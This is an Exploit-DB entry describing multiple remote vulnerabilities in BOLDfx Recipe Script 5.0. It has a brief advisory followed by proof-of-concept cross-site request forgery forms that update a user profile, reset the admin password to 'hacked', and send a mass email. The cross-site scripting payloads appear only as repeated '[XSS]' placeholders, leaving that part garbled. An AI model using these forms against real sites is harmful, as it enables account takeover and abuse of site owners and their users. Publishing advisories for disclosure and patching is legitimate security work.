BOLDfx Recipe Script 5.0 - Multiple Remote Vulnerabilities

ID EDB-ID:34352
Type exploitdb
Reporter Milos Zivanovic
Modified 2009-12-16T00:00:00


BOLDfx Recipe Script 5.0 Multiple Remote Vulnerabilities. Webapps exploit for php platform


BOLDfx Recipe Script is prone to multiple remote vulnerabilities, including multiple cross-site request-forgery vulnerabilities, an arbitrary file upload vulnerability, multiple HTML-injection vulnerabilities and multiple cross-site scripting vulnerabilities.

Attacker-supplied HTML and script code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user. A remote attacker may also be able to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Recipe Script 5.0 is vulnerable; other versions may also be affected."[XSS]"[XSS]"[XSS]"[XSS]"[XSS]"[XSS]"[XSS]"[XSS]"[XSS]"[XSS]"[XSS]"[XSS]"[XSS]"[XSS]"[XSS]

<form action="" method="POST"> <input name="first_name" type="text" value="DEMO"> <input name="last_name" type="text" value="USER"> <input name="website" type="text" value=""> <input name="country" type="text" value="Moon State"> <input name="email" type="text" value=""> <input type="checkbox" name="subscribed" value="1"> <input type="submit" name="Submit" value="Update"> </form> <form action="" method="POST"> <input type="password" name="AdminPass" value="hacked"> <input type="password" name="cAdminPass" value="hacked"> <input type="submit" name="submit" value="Update Password"> </form> <form action="" method="POST"> <input type="hidden" name="from_email" value=""> <input type="hidden" name="subject" value="Subject"> <input type="hidden" name="message" value="Free your mind and the ass will follow!"> <input type="hidden" name="emailtype" value=""> <input type="submit" name="Submit" value="Send"> </form>